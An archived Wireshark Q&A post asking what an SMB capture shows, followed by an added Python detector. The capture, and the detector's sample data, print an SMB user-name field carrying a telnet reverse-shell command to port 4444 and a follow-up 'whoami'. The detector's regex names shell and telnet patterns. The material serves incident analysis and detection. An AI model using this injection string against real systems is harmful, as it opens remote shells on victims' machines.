This is a static archive of our old Q&A Site. Please post any new questions and answers at ask.wireshark.org.

SMB protocol analysis


Hi, from my pcap file I got the following portion of information, but I am not sure what the source IP is trying to achieve.

frame  time  src ip  dest ip  protocol  src port  dest port  info
21769 147.373996 192.168.0.100 192.168.0.101 SMB 54500 139 Session Setup AndX Request, User: .\/=`nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|while : ; do sh && break; done 2>&1|telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'`
21770 147.394553 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [SYN] Seq=0 Win=5840 Len=0 MSS=1460 SACK_PERM=1 TSval=6036562 TSecr=0 WS=32 0x0002
21771 147.394664 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=13805079 TSecr=6036562 WS=1024 0x0012
21772 147.395838 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [ACK] Seq=1 Ack=1 Win=5856 Len=0 TSval=6036562 TSecr=13805079 0x0010
21773 147.406146 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [SYN] Seq=0 Win=5840 Len=0 MSS=1460 SACK_PERM=1 TSval=6036563 TSecr=0 WS=32 0x0002
21774 147.406244 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=13805081 TSecr=6036563 WS=1024 0x0012
21775 147.407522 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [ACK] Seq=1 Ack=1 Win=5856 Len=0 TSval=6036563 TSecr=13805081 0x0010
21776 147.407694 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=1 Ack=1 Win=5856 Len=39 TSval=6036563 TSecr=13805081 sh line 1 : Trying : command not found
21777 147.407721 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=40 Win=15360 Len=0 TSval=13805082 TSecr=6036563
21778 147.410351 192.168.0.101 192.168.0.100 TCP 139 54500 139→54500 [ACK] Seq=102 Ack=376 Win=6880 Len=0 TSval=6036564 TSecr=13805073
21779 147.427226 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=40 Ack=1 Win=5856 Len=42 TSval=6036565 TSecr=13805082 sh: line 2: Connected: Command not found
21780 147.427309 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=82 Win=15360 Len=0 TSval=13805087 TSecr=6036565
21781 147.440335 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=82 Ack=1 Win=5856 Len=39 TSval=6036567 TSecr=13805087 sh: line 3:Escape: command not found
21782 147.440457 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=121 Win=15360 Len=0 TSval=13805090 TSecr=6036567
21783 147.448315 192.168.0.101 192.168.0.100 SMB 139 54500 Session Setup AndX Response, Error: STATUS_LOGON_FAILURE
21784 147.486578 192.168.0.100 192.168.0.101 TCP 54500 139 54500→139 [ACK] Seq=376 Ack=141 Win=15360 Len=0 TSval=13805102 TSecr=6036567
21785 147.663484 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [PSH, ACK] Seq=1 Ack=1 Win=15360 Len=23 TSval=13805146 TSecr=6036562 echo X nxb0Jq26W1POGYH
21786 147.664095 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [ACK] Seq=1 Ack=24 Win=5856 Len=0 TSval=6036589 TSecr=13805146
21787 147.664294 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [PSH, ACK] Seq=121 Ack=1 Win=5856 Len=18 TSval=6036589 TSecr=1380509 XnXb0J q26w1POGYH
21788 147.664321 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [ACK] Seq=1 Ack=139 Win=15360 Len=0 TSval=13805146 TSecr=6036589
21789 147.668188 192.168.0.100 192.168.0.101 TCP 4444 57927 4444→57927 [PSH, ACK] Seq=1 Ack=139 Win=15360 Len=23 TSval=13805147 TSecr=6036589 echo X nxb0Jq26W1POGYH
21790 147.668708 192.168.0.101 192.168.0.100 TCP 57927 4444 57927→4444 [ACK] Seq=139 Ack=24 Win=5856 Len=0 TSval=6036589 TSecr=13805147
21791 148.989787 192.168.0.100 192.168.0.101 TCP 54500 139 54500→139 [RST, ACK] Seq=376 Ack=141 Win=15360 Len=0 TSval=13805477 TSecr=6036567
21792 152.823638 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [PSH, ACK] Seq=24 Ack=1 Win=15360 Len=7 TSval=13806436 TSecr=6036589 whoami

Regards, George

asked 27 Feb '15, 09:57


Geos

edited 27 Feb '15, 10:48


grahamb ♦

Can you share a capture in a publicly accessible spot, e.g. CloudShark?

(27 Feb '15, 14:41) Jaap ♦
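As an added defender-side example (not from the question, the commenters or Wireshark), the following Python scans a plain-text packet list in the column layout of the excerpt above for SMB Session Setup requests whose User field carries shell syntax, and correlates each one with new TCP connections the SMB server opens back to the SMB client shortly afterwards. The row format, the metacharacter list and the 10-second correlation window are assumptions; the sample rows are copied from the capture excerpt in the question.

```python
import re
from collections import namedtuple

# One row of a Wireshark packet list exported as text, in the column order of the
# question: frame, time, src, dst, protocol, src port, dst port, info (free text).
ROW = re.compile(r"^(\d+)\s+([\d.]+)\s+(\S+)\s+(\S+)\s+(SMB|TCP)\s+(\d+)\s+(\d+)\s+(.*)$")
# Shell syntax that has no business inside an SMB user name (assumed list).
SHELL_META = re.compile(r"`|\$\(|\bsh\s+-c\b|\|\s*telnet\b|\bnohup\b")
Packet = namedtuple("Packet", "frame time src dst proto sport dport info")

def parse_rows(text):
    pkts = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            f, t, s, d, p, sp, dp, info = m.groups()
            pkts.append(Packet(int(f), float(t), s, d, p, int(sp), int(dp), info))
    return pkts

def find_injected_logons(pkts):
    """SMB Session Setup requests whose User field carries shell syntax."""
    hits = []
    for p in pkts:
        if p.proto == "SMB" and "Session Setup AndX Request" in p.info and "User:" in p.info:
            user = p.info.split("User:", 1)[1].strip()
            if SHELL_META.search(user):
                hits.append(p)
    return hits

def find_callbacks(pkts, hit, window=10.0):
    """Bare SYNs from the SMB server back to the SMB client within `window` seconds
    of the injected logon: the server reaching out is the reverse-shell signature."""
    return [p for p in pkts
            if p.proto == "TCP" and "[SYN]" in p.info
            and p.src == hit.dst and p.dst == hit.src
            and hit.time <= p.time <= hit.time + window]

def report(text):
    """One (frame, client, server, [(callback frame, callback port), ...]) per finding."""
    pkts = parse_rows(text)
    return [(h.frame, h.src, h.dst, [(c.frame, c.dport) for c in find_callbacks(pkts, h)])
            for h in find_injected_logons(pkts)]

# Constructed sample: five rows taken from the capture excerpt in the question.
SAMPLE = r"""
21769 147.373996 192.168.0.100 192.168.0.101 SMB 54500 139 Session Setup AndX Request, User: .\/=`nohup sh -c '(sleep 3807|telnet 192.168.0.100 4444|while : ; do sh && break; done 2>&1|telnet 192.168.0.100 4444 >/dev/null 2>&1 &)'`
21770 147.394553 192.168.0.101 192.168.0.100 TCP 57926 4444 57926→4444 [SYN] Seq=0 Win=5840 Len=0 MSS=1460 SACK_PERM=1 TSval=6036562 TSecr=0 WS=32
21771 147.394664 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM=1 TSval=13805079 TSecr=6036562 WS=1024
21783 147.448315 192.168.0.101 192.168.0.100 SMB 139 54500 Session Setup AndX Response, Error: STATUS_LOGON_FAILURE
21792 152.823638 192.168.0.100 192.168.0.101 TCP 4444 57926 4444→57926 [PSH, ACK] Seq=24 Ack=1 Win=15360 Len=7 TSval=13806436 TSecr=6036589 whoami
"""
```

`report(SAMPLE)` flags frame 21769 and pairs it with the SYN in frame 21770 to port 4444; the `STATUS_LOGON_FAILURE` response is irrelevant to the finding, since the command ran before the logon was rejected.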